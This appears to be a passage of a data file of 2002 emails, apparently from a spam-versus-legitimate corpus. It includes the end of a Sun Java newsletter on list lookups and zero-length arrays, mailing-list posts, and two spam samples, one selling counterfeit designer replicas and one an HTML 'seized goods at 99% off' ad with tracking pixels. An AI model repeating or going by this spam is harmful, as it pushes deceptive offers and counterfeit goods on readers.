         static long timeList() {
             long start = System.currentTimeMillis();
             for (int i = 0; i &amp;lt; N; i++) {
                 int indx = Collections.binarySearch(
                                     keys, keys.get(i));
                 // sanity check of returned value 
                 // from binary search
                 if (indx != i) {
                     System.out.println(
                                     &amp;quot;*** error ***\n&amp;quot;);
                 }
             }
             return System.currentTimeMillis() - start;
         }
         // do Map lookup of all keys
         static long timeMap() {
             long start = System.currentTimeMillis();
             for (int i = 0; i &amp;lt; N; i++) {
                 Integer value = (Integer)map.get(
                                           keys.get(i));
                 // sanity check of value returned 
                 // from map lookup
                 if (value != values.get(i)) {
                     System.out.println(
                                     &amp;quot;*** error ***\n&amp;quot;);
                 }
             }
             return System.currentTimeMillis() - start;
         }
         public static void main(String args[]) {
             // do timing for List implementation
             System.out.println("List time = " + 
                                            timeList());
             // do timing for Map implementation
             System.out.println(&amp;quot;Map time = &amp;quot; + 
                                             timeMap());
         }
     }
 &lt;/pre&gt;
 &lt;p&gt;
 The program sets up &lt;code&gt;Lists&lt;/code&gt; of keys and values, and then uses two different techniques to map keys to values. One approach uses a binary search on a list, the other a hash table.
 &lt;/p&gt;
 &lt;p&gt;
 When you run the &lt;code&gt;ListDemo3&lt;/code&gt; program, you should get a result that looks something like this:
 &lt;/p&gt;
 &lt;pre&gt;
     ArrayList time = 1000
     HashMap time = 281
 &lt;/pre&gt;
 &lt;p&gt;
 In this example, N has a value of 500000. Approximately, log2(N) - 1 comparisons are required in an average successful binary search, so each binary search lookup in the &lt;code&gt;ArrayList&lt;/code&gt; will take about 18 comparisons. By contrast, a properly implemented hash table typically requires only 1-3 comparisons. So you should expect the hash table to be faster in this case.
 &lt;/p&gt;
 &lt;p&gt;
 However, binary search is still useful. For example, you might want to do a lookup in a sorted list and then find keys that are close in value to the key used for the lookup. Doing this is easy with binary search, but impossible in a hash table. Keys in a hash table are stored in apparent random order. Also, if you are concerned with worst-case performance, the binary search algorithm offers a much stronger performance guarantee than a hash table scheme. You might also consider using TreeMap for doing lookups in sorted collections of key/value pairs.
 &lt;/p&gt;
 &lt;p&gt;
 Let's summarize the key points presented in this tip:
 &lt;/p&gt;
 &lt;ul&gt;
   &lt;li&gt;Appending elements to the end of a list has a fixed averaged cost for both &lt;code&gt;ArrayList&lt;/code&gt; and &lt;code&gt;LinkedList.&lt;/code&gt; For &lt;code&gt;ArrayList&lt;/code&gt;, appending typically involves setting an internal array location to the element reference, but occasionally results in the array being reallocated. For &lt;code&gt;LinkedList&lt;/code&gt;, the cost is uniform and involves allocating an internal &lt;code&gt;Entry&lt;/code&gt; object.&lt;/li&gt;
   &lt;li&gt;Inserting or deleting elements in the middle of an &lt;code&gt;ArrayList&lt;/code&gt; implies that the rest of the list must be moved. Inserting or deleting elements in the middle of a &lt;code&gt;LinkedList&lt;/code&gt; has fixed cost.&lt;/li&gt;
   &lt;li&gt;A &lt;code&gt;LinkedList&lt;/code&gt; does not support efficient random access&lt;/li&gt;
   &lt;li&gt;An &lt;code&gt;ArrayList&lt;/code&gt; has space overhead in the form of reserve capacity at the end of the list. A &lt;code&gt;LinkedList&lt;/code&gt; has significant space overhead per element.&lt;/li&gt;
   &lt;li&gt;Sometimes a &lt;code&gt;Map&lt;/code&gt; structure is a better choice than a &lt;code&gt;List&lt;/code&gt;.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;
 For more information about Using &lt;code&gt;ArrayList&lt;/code&gt; and &lt;code&gt;LinkedLists&lt;/code&gt;, see section 16.6, List, and section 16.7, Map and SortedMap, in &amp;quot;&lt;a href="http://java.sun.com/docs/books/javaprog/thirdedition/?s=04&amp;w=37" target="_blank"&gt;The Java&lt;sup&gt;TM&lt;/sup&gt; Programming Language Third Edition&lt;/a&gt;&amp;quot; by Arnold, Gosling, and Holmes. Also see the &lt;a href="http://java.sun.com/docs/books/tutorial/collections/?s=04&amp;w=37" target="_blank"&gt;Collections trail in the Java Tutorial, Third Edition&lt;/a&gt;.
 &lt;/p&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="right"&gt;
 &lt;a href="#top"&gt;back to top&lt;img src="http://developer.java.sun.com/images/back_to_top.gif" border="0" alt="Pixel"&gt;&lt;/a&gt;
 &lt;/div&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#ffffff" height="2"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" ALT="Pixel" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- Grey Horizontal Line Begins Here --&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#cccccc" height="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" ALT="Pixel" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;!-- Grey Horizontal Line ends Here --&gt;
 &lt;a name="2"&gt;&lt;/a&gt;
 &lt;h3&gt;USING ZERO-LENGTH ARRAYS&lt;/h3&gt;
 &lt;p&gt;
 Suppose that you are writing a Java application that involves some sort of data filtering. You have some raw data that you want to clean up and process in various ways. One of the methods you've written takes an array of integers, along with minimum and maximum values. The method goes through the array and eliminates &amp;quot;outliers,&amp;quot; that is, values that are too small or too big. The result of the filtering process is a new array of cleaned-up data.
 &lt;/p&gt;
 &lt;p&gt;
 How could you implement this kind of filtering method? Here's one approach:
 &lt;/p&gt;
 &lt;pre&gt;
     import java.util.*;
     public class ZeroDemo1 {
         // filter input array and throw away values 
         // that are less than minval or greater than 
         // maxval
         static int[] filterData(
                 int indata[], int minval, int maxval) {
             // check parameters for errors 
             if (indata == null) {
                 throw new NullPointerException(
                                      &amp;quot;indata is null&amp;quot;);
             }
             if (maxval &amp;lt; minval) {
                 throw new IllegalArgumentException(
                 &amp;quot;maxval &amp;lt; minval&amp;quot;);
             }
             // count number of valid values 
             // in input array
             int validcnt = 0;
             for (int i = 0; i &amp;lt; indata.length; i++) {
                 if (indata[i] &amp;gt;= minval &amp;amp;&amp;amp; indata[i] 
                                          &amp;lt;= maxval) {
                     validcnt++;
                 }
             }
             // if no valid values, return null
             if (validcnt == 0) {
                 return null;
             }
             // copy valid values to new array 
             // and return it
             int outdata[] = new int[validcnt];
             for (int i = 0, j = 0; 
                               i &amp;lt; indata.length; i++) {
                 if (indata[i] &amp;gt;= minval &amp;amp;&amp;amp; indata[i] 
                                            &amp;lt;= maxval) {
                     outdata[j++] = indata[i];
                 }
             }
             return outdata;
         }
         public static void main(String args[]) {
             // set up test array of integers
             int indata[] = new int[]{1, 3, -17, 8, 59};
             // filter out values not in the range 1-10
             int outdata1[] = filterData(indata, 1, 10);
             for (int i = 0; i &amp;lt; outdata1.length; i++) {
                 System.out.println(outdata1[i]);
             }
             // filter out values not 
             // in the range 100-200
             int outdata2[] = filterData(
                                      indata, 100, 200);
             for (int i = 0; i &amp;lt; outdata2.length; i++) {
                 System.out.println(outdata2[i]);
             }
         }
     }
 &lt;/pre&gt;
 &lt;p&gt;
 The &lt;code&gt;filterData&lt;/code&gt; method does two scans of the input array. The first scan counts the number of valid data values. Then the method allocates a new array of the appropriate size, and copies the good values to it. If there are no good values, the method returns a null value for the array reference.
 &lt;/p&gt;
 &lt;p&gt;
 The result of running the &lt;code&gt;ZeroDemo1&lt;/code&gt; program is:
 &lt;/p&gt;
 &lt;pre&gt;
     1
     3
     8
     Exception in thread &amp;quot;main&amp;quot;
     java.lang.NullPointerException
         at ZeroDemo1.main(ZeroDemo1.java:72)
 &lt;/pre&gt;
 &lt;p&gt;
 The problem with this program is a rather basic one. The second call of &lt;code&gt;filterData&lt;/code&gt; returns a null value, and the program fails to take this possibility into account.
 &lt;/p&gt;
 &lt;p&gt;
 A better approach in this example would be to comment out the block of code that tests for the possibility of no valid data values:
 &lt;/p&gt;
 &lt;pre&gt;
     /*
     if (validcnt == 0) {
         return null;
     }
     */
 &lt;/pre&gt;
 &lt;p&gt;
 When there is no valid data, the code will fall through to the next line, where a zero-length array is allocated:
 &lt;/p&gt;
 &lt;pre&gt;
     int outdata[] = new int[0];
 &lt;/pre&gt;
 &lt;p&gt;
 This is perfectly legal Java usage. The representation of Java arrays includes the length of the array, and it's therefore possible to tell if an array has zero length.
 &lt;/p&gt;
 &lt;p&gt;
 For the &lt;code&gt;ZeroDemo1&lt;/code&gt; example, if you anticipate that validcnt will often be zero, that is, data filtering will often eliminate all values from the input, then you could optimize away the second input scan by adding code like this:
 &lt;/p&gt;
 &lt;pre&gt;
     int outdata[] = new int[validcnt];
     if (validcnt == 0) {
         return outdata;
     }
 &lt;/pre&gt;
 &lt;p&gt;
 Note that usage such as:
 &lt;/p&gt;
 &lt;pre&gt;
     int outdata[] = new int[]{};
 &lt;/pre&gt;
 &lt;p&gt;
 is also legal, to initialize an array with a zero-length set of integer constants.
 &lt;/p&gt;
 &lt;p&gt;
 In general, it's best not to return null from a method that returns an array type. Always returning an array, even if the array has zero length, greatly improves the generality of algorithms. If you anticipate that your methods will often return zero-length arrays, you might be concerned about the performance implications of allocating many such arrays. In this case, you can allocate a single array, and always return the same one, as follows:
 &lt;/p&gt;
 &lt;pre&gt;
     private static final int ZERO_LENGTH_ARRAY[] = 
                                             new int[0];
 &lt;/pre&gt;
 &lt;p&gt;
 This array is immutable (it can't be changed), and can be shared throughout your application.
 &lt;/p&gt;
 &lt;p&gt;
 There's another way that zero-length arrays are used, as illustrated in the following example:
 &lt;/p&gt;
 &lt;pre&gt;
     import java.util.*;
     public class ZeroDemo2 {
         public static void main(String args[]) {
             // set up ArrayList and add strings to it
             List stringlist = new ArrayList();
             stringlist.add(&amp;quot;string 1&amp;quot;);
             stringlist.add(&amp;quot;string 2&amp;quot;);
             stringlist.add(&amp;quot;string 3&amp;quot;);
             // convert to String array
             String out[] = (
                           String[])stringlist.toArray(
             new String[0]);
             for (int i = 0; i &amp;lt; out.length; i++) {
                 System.out.println(out[i]);
             }
         }
     }
 &lt;/pre&gt;
 &lt;p&gt;
 The result of running the &lt;code&gt;ZeroDemo2&lt;/code&gt; program is:
 &lt;/p&gt;
 &lt;pre&gt;
     string 1
     string 2
     string 3
 &lt;/pre&gt;
 &lt;p&gt;
 The &lt;code&gt;ZeroDemo2&lt;/code&gt; program sets up an &lt;code&gt;ArrayList&lt;/code&gt;, and adds three strings to it. Then the program calls &lt;code&gt;toArray&lt;/code&gt; to get a &lt;code&gt;String&lt;/code&gt; array of the three elements in the &lt;code&gt;ArrayList&lt;/code&gt;. In this example, the argument to &lt;code&gt;toArray&lt;/code&gt; is &amp;quot;new String[0]&amp;quot;. This argument serves a couple of purposes. First, if you have a &lt;code&gt;String&lt;/code&gt; array that's big enough to hold the elements of the &lt;code&gt;ArrayList&lt;/code&gt;, you can specify it as the argument to &lt;code&gt;toArray&lt;/code&gt;. The method will use the &lt;code&gt;String&lt;/code&gt; array.
 &lt;/p&gt;
 &lt;p&gt;
 But if your array is not big enough, then the &lt;code&gt;toArray&lt;/code&gt; method allocates an array to return the elements. It uses the type of the array that was passed in to determine the type of the allocated array. &lt;code&gt;ArrayList&lt;/code&gt; stores its element references in an &lt;code&gt;Object&lt;/code&gt; array. The &lt;code&gt;toArray&lt;/code&gt; method needs to be told if there is some other type (such as String) to be used for returning the array of elements. The method uses reflection (&lt;code&gt;java.lang.reflect.Array.newInstance&lt;/code&gt;) to create an array of the appropriate type.
 &lt;/p&gt;
 &lt;p&gt;
 For more information about using zero-Length arrays, see item 27 &amp;quot;Return zero-length arrays, not nulls&amp;quot; in &amp;quot;&lt;a href="http://java.sun.com/docs/books/effective/?s=04&amp;w=37" target="_blank"&gt;Effective Java Programming Language Guide&lt;/a&gt;&amp;quot; by Joshua Bloch.
 &lt;/p&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;div align="right"&gt;
 &lt;a href="#top"&gt;back to top&lt;img src="http://developer.java.sun.com/images/back_to_top.gif" border="0" alt="Pixel"&gt;&lt;/a&gt;
 &lt;/div&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#ffffff" height="2"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" ALT="Pixel" border="0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;!-- Grey Horizontal Line Begins Here --&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#cccccc" height="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" ALT="Pixel" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt; 
 &lt;!-- Grey Horizontal Line ends Here --&gt;
 &lt;br&gt;
 &lt;span class="small"&gt;IMPORTANT: Please read our Terms of Use, Privacy, and Licensing policies:&lt;br&gt;
 &lt;a href="http://www.sun.com/share/text/termsofuse.html?s=04&amp;w=37"&gt;&lt;span class="link"&gt;http://www.sun.com/share/text/termsofuse.html&lt;/span&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.sun.com/privacy/?s=04&amp;w=37"&gt;&lt;span class="link"&gt;http://www.sun.com/privacy/&lt;/span&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://developer.java.sun.com/berkeley_license.html?s=04&amp;w=37"&gt;&lt;span class="link"&gt;http://developer.java.sun.com/berkeley_license.html&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
 Comments? Send your feedback on the Java&lt;sup&gt;TM&lt;/sup&gt; Technology Fundamentals Newsletter to: &lt;a href="mailto:jdc-webmaster@sun.com"&gt;&lt;span class="link"&gt;jdc-webmaster@sun.com&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
 Subscribe to the following newsletters for the latest information about technologies and products in other Java platforms:
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;
   - Enterprise Java Technologies Tech Tips. Get tips on using
     enterprise Java technologies and APIs, such as those in the
     Java 2 Platform, Enterprise Edition (J2EE&lt;sup&gt;TM&lt;/sup&gt;).&lt;br&gt;
   - Wireless Developer Tech Tips. Get tips on using wireless
     Java technologies and APIs, such as those in the Java 2 
     Platform, Micro Edition (J2ME&lt;sup&gt;TM&lt;/sup&gt;).&lt;br&gt;&lt;br&gt;
 &lt;/span&gt;
 &lt;span class="small"&gt;
   To subscribe to these and other JDC publications:&lt;br&gt;
   - Go to the JDC Newsletters and Publications page, 
     choose the newsletters you want to &lt;a href="http://developer.java.sun.com/subscription/?s=04&amp;w=37"&gt;&lt;span class="link"&gt;subscribe&lt;/span&gt;&lt;/a&gt; to and click &amp;quot;Update&amp;quot;.&lt;br&gt;
   - To unsubscribe, go to the &lt;a href="http://developer.java.sun.com/subscription/?s=04&amp;w=37"&gt;&lt;span class="link"&gt;subscriptions page&lt;/span&gt;&lt;/a&gt;, uncheck the appropriate checkbox, and click &amp;quot;Update&amp;quot;.
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;ARCHIVES: You'll find the Core Java Technologies Tech Tips archives at:&lt;br&gt;
 &lt;a href="http://java.sun.com/jdc/TechTips/?s=04&amp;w=37"&gt;&lt;span class="link"&gt;http://java.sun.com/jdc/TechTips/index.html&lt;/span&gt;&lt;/a&gt;
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;Copyright 2002 &lt;a href="http://www.sun.com?s=04&amp;w=37"&gt;&lt;span class="link"&gt;Sun Microsystems, Inc.&lt;/span&gt;&lt;/a&gt; All rights reserved. 901 San Antonio Road, Palo Alto, California 94303 USA.
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;span class="small"&gt;Sun, Sun Microsystems, Java, Java Developer Connection, J2SE, J2EE, and J2ME are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries.
 &lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;!-- ================ --&gt;
 &lt;!-- End Main Content --&gt;
 &lt;!-- ================ --&gt;
 &lt;center&gt;
 &lt;a href="http://www.sun.com"&gt;&lt;img src="http://developer.java.sun.com/images/lgsun.gif" border="0" alt="Sun Microsystems, Inc."&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td bgcolor="#cccccc" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" bgcolor="#cccccc" width="1"&gt;&lt;img src="http://developer.java.sun.com/images/pixel.gif" width="1" height="1" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table bgcolor = "#efefef"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://bulkmail.sun.com/servlet/PreferenceServlet?action=change&amp;pref_name=content-type&amp;pref_value=text&amp;id=216095411795471888"&gt;Please send me newsletters in text.&lt;/a&gt;&lt;br&gt;&lt;a href="http://bulkmail.sun.com/unsubscribe?216095411795471888"&gt;Please unsubscribe me from this newsletter.&lt;/a&gt;&lt;img src="http://bulkmail2.sun.com/OTServlet?id=216095411795471888" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;
 &lt;/html&gt;		
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Species at risk of extinction growing
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8653742,1440/
 Date: Not supplied
 The latest "Red List" adds 124 to the 11,000 endangered species around the 
 globe - but also includes a stick insect revival
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Best Replica Goods - Best Prices
</t>
  </si>
  <si>
    <t xml:space="preserve">*** FREE BONUS OFFER - SEE BELOW ***
 We can supply TOP QUALITY, VIRTUALLY IDENTICAL REPLICAS of just about anything - from watches to wallets, from lighters to lingerie, clothing, accessories, even electrical goods. All your favorite designer labels reproduced at a fraction of the price.
 All major Credit Cards accepted. Worldwide certified shipping. Quality guaranteed.
 We are currently building our catalog so let us know that you want to receive notification when our on-line catalog is published later this month to qualify for a GREAT FREE BONUS OFFER.
 *** FREE BONUS: Register NOW for our catalog and receive one pair of designer REPLICA sunglasses (our regular price $15) &amp; check out the quality of our goods FREE OF CHARGE ***
 For more information email: replicas@fastnetspain.net
 Register NOW to be sure you don't miss out !!!
 To remove from future mailings email: noreplicas@fastnetspain.net
 Register NOW to be sure you don't miss out !!!
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FBI &amp; IRS seized goods at 99% off! Police Auctions!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;PoliceAuctions.com&lt;/title&gt;
 &lt;style type=text/css&gt;
 a:link{font-family:verdana;color:003399;font-size:14px;font-weight:bold;text-decoration:none;}
 a:hover{font-family:verdana;color:ff0000;font-size:14px;font-weight:bold;text-decoration:underline;}
 a:active{font-family:verdana;color:ff0000;font-size:14px;font-weight:bold;text-decoration:underline;}
 a:visited{font-family:verdana;color:003399;font-size:14px;font-weight:bold;text-decoration:underline;}
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table width="62%" border="1" cellspacing="0" cellpadding="0" bordercolor="#FF0000" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellpadding="0" cellspacing="0" width="608"&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="234" height="1" border="0"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="28" height="1" border="0"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="162" height="1" border="0"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="184" height="1" border="0"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td rowspan="2" colspan="3"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRAUHQDEFYUB&amp;ext=1" target="_blank"&gt;&lt;img src="http://policeauctions.com/affiliates/html/successpage_ad_r1_c1.gif" width="424" height="246" border="0" alt="PoliceAuctions.com"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td bgcolor="#FFFFFF"&gt; &lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="1" height="128" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRAUHQDEFYUB&amp;ext=1" target="_blank"&gt;&lt;img src="http://policeauctions.com/affiliates/html/successpage_ad_r2_c4.gif" width="184" height="118" border="0" alt="PoliceAuctions.com"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="1" height="118" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRAUHQDEFYUB&amp;ext=1" target="_blank"&gt;&lt;img src="http://policeauctions.com/affiliates/html/successpage_ad_r3_c1.gif" width="234" height="149" border="0" alt="PoliceAuctions.com"&gt;&lt;/a&gt;&lt;/td&gt;
           &lt;td colspan="3" bgcolor="#FFFFFF"&gt;
             &lt;p align="left"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRAUHQDEFYUB&amp;ext=1" target="_blank"&gt;
 			Awesome deals on seized and unclaimed &lt;br&gt;
               property the government auctions to the public. Cars from $100,
               Real estate, jewelry, personal property, collectibles, antiques
               and more.&lt;/a&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;&lt;font color="#003399"&gt;
 			&lt;a href="http://theadmanager.com/server/c.asp?ad_key=XRAUHQDEFYUB&amp;ext=1" target="_blank"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
           &lt;td&gt;&lt;img src="http://www.policeauctions.com/affiliates/html/spacer.gif" width="1" height="149" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=XRAUHQDEFYUB"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</si>
  <si>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On Wed, 24 Jul 2002, rODbegbie wrote:
 &gt; rODbegbie wrote:
 &gt; &gt; I get the impression that Vipul &amp; co are deliberately trying to
 &gt; &gt; mislead users into downloading the dev code in order to get more
 &gt; &gt; unwitting test sites.
 &gt;
 &gt; Apologies to all.  In re-reading, that sentence sounds a lot harsher than I
 &gt; intended.
 The question I have is: what needs to be done/help needs to be provided to
 make the system suck less? It's obviously a great idea, it just needs some
 work...
 /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
                                Patrick Greenwell
          Asking the wrong questions is the leading cause of wrong answers
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Elias Sinderson wrote:
 &gt; 802.11b - 11Mbps per channel over three channels in the 2.4GHz range 
 &gt; (also shared with microwaves and cordless phones) 
 Microwaves, cordless phones and video-based baby monitors....
 Greg
 -- 
 Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
 gbolcer at endeavors.com  | http://endeavors.com
 Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The case for spam
</t>
  </si>
  <si>
    <t xml:space="preserve">Dan Brickley wrote:
 &gt; Except that thanks to the magic of spam, it's usually some else's locale
 yeah, physical mail makes more sense for physical locales.
 &gt; There are better technical solutions to privacy
 &gt; protection than sending a copy of the same message to everyone on the
 &gt; Internet, so the recipients can't be blamed for reading it.
 Such as?
 Anything equivalent will be spam, just not email spam.  Dump entry IPs for
 an anonymizing network onto a public bulletin board that's used for other
 purposes -- still spam.  Etc etc.
 I'm not arguing against other solutions, I'm arguing that spam is speech.  
 If you let governments ban it, you're giving them the power to choose who 
 gets to speak.
 - Lucas
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] RBL timed oiut and Spam Assassin killed
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm getting these messages and I'm not sure what they mean. Can anyone clear 
 this up for me? Thanks.
 Sep 15 11:45:09 linux mailscanner[6128]: RBL Check ORDB-RBL timed out and 
 was killed, consecutive failure 3 of 7
 Sep 15 11:45:24 linux mailscanner[6128]: SpamAssassin timed out and was 
 killed
 -- 
 This message has been scanned for viruses and
 dangerous content by MailScanner at comp-wiz.com,
 and is believed to be clean.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</si>
  <si>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For you, and you, and Timmy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524618
 Date: Not supplied
 [IMG: http://www.craphound.com/images/timmyerrorsmall.jpg] Check out this weird 
 easter-egg I found in MacOS 10.2.1's Sharing control panel! Link[1] Discuss[2]
 [1] http://www.craphound.com/images/timmyerrorbig.jpg
 [2] http://www.quicktopic.com/boing/H/W4evyQiUY2xsb
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A productive thread
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#aProductiveThread
 Date: Thu, 26 Sep 2002 00:18:04 GMT
 "rssflowersalignright"A productive thread[1] on RSS-DEV confronts the 
 negativeness about RSS 2.0[2] head-on. This will go someplace interesting.  
 I left a big hint there in the way the blogChannel module[3] is designed, 
 patterned after the Syndication module[4] designed by the RDF folk. In other 
 words, the place where they're expressing discomfort with RSS 2.0 is where they 
 can make it their own. Lead. Instead of feeling disempowered, be powerful.  
 At one point I saw clearly where the compromise between RSS 0.9x and 1.0 was. 
 We could have gotten there in early 2001, so instead we get there in late 2002. 
 So what, not a big deal. Think about how much better it will be _when we're all 
 advocating the same format._ Visualize peace. That's basically what I did when 
 I did the 2.0 spec. I know it's hard to swallow, but swallow anyway. If I did 
 it, you can too.
 [1] http://groups.yahoo.com/group/rss-dev/message/4032
 [2] http://backend.userland.com/rss
 [3] http://backend.userland.com/blogChannelModule
 [4] http://web.resource.org/rss/1.0/modules/syndication/
</t>
  </si>
  <si>
    <t xml:space="preserve">Robert Harley:
 &gt;&gt;BTW, I wasn't aware that the 1st Amendment mandated that crap must be 
 &gt;&gt;FoRKed.
 Chuck Murcko &lt;chuck@topsail.org&gt;:
 &gt;It doesn't, BTW. It says the right to free speech shall not be abridged. 
 &gt;That means *you* can't say anything may not be FoRKed or printed or 
 &gt;whatever.
 Actually, it means just the opposite. The first
 amendment guarantees Harley's right to say just
 that. For the outlets where he has editorial
 control, it even guarantees his right to CENSOR
 content published through those outlets. The
 first amendment doesn't limit Harley's speech,
 and it is neutral with regard to the selection
 policies of FoRK and other private venues.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
</t>
  </si>
  <si>
    <t xml:space="preserve">--2+N3zU4ZlskbnZaJ
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 &gt; Simple approxmation to this: make /usr a separate partion, and mount it=
 =20
 &gt; read-only:
 &gt;=20
 &gt;    * The good news: attackers that want to trojan your software have to
 &gt;      reboot, at least.
 &gt;    * The bad news: administrators that want to update your software
 &gt;      have to reboot, at least.
 No reboot is required, you just need to remount it:
 	# mount -o remount,rw /usr
 This requires root access, but presumably /usr is safe from non-root
 users anyway.
 Only way to disable this is to have the kernel compiled with something
 that compartmentalizes capabilities (LIDS/etc on Linux for example) or to
 remove CAP_SYS_ADMIN with lcap, which would definately require a reboot,
 and possibly break some other functionatily to boot.  (Pun intended.  My
 apologies.)
 --
 Brian Hatch                  "Are you expected?"
    Systems and               "No.  Dreaded."
    Security Engineer
 www.hackinglinuxexposed.com
 Every message PGP signed
 --2+N3zU4ZlskbnZaJ
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iEYEARECAAYFAj13o3EACgkQp6D9AhxzHxDMkACfR3m+eBXLfiZUFRd+jlBwu4MH
